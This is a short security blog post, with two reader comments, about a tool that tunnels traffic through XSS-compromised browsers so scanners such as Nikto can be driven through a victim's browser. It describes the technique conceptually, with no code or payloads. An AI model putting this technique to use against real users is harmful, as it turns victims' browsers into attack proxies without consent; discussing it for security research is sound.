Cenzic 232 Patent
Paid Advertising
web application security lab

XSS Proxy Tunnelling

Jason Wood alerted me to this one. Apparently Ferruh Mavituna posted about a new tool he’s created to do XSS tunneling. At first blush it looks a lot like what Jeremiah Grossman built and what Billy Hoffman later re-created for Jikto, except Ferruh’s is in .NET instead of server side scripts. “So what” you say? Well there is one aspect of this that actually is interesting and caught my eye.

He built his tool to be a proxy, so that you could write other third party scanning tools that interface with it. So let’s say you’ve got Nikto, but you want your target to do the work for you. You can plug Nikto into this, use it like a proxy, and poof, the client is now under Nikto’s control, by way of XSS Tunneling, by way of JavaScript running on their browser. Crazy, but cool. Ferruh’s also got a nice writeup and video to go along with it. Very cool stuff!

2 Responses to “XSS Proxy Tunnelling”

  1. planadecu Says:

    I saw a similar tool in the OWASP conference in Milan. It’s a private tool used by the WatchFire pentesters. It was used in the Google Desktop Hack speak: http://www.owasp.org/images/8/86/OWASPAppSec2007Milan_OvertakingGoogleDesktop.ppt
    That tool consists on a “server” that tracks users that connects to a web with a malicious javascript that make them connect that tool. After that you can execute live javscript commands.

    Cool!

  2. hackathology Says:

    i just went through the video, i roughly understand what it tries to do, however, i have to read the pdf to totally understand the whole thing..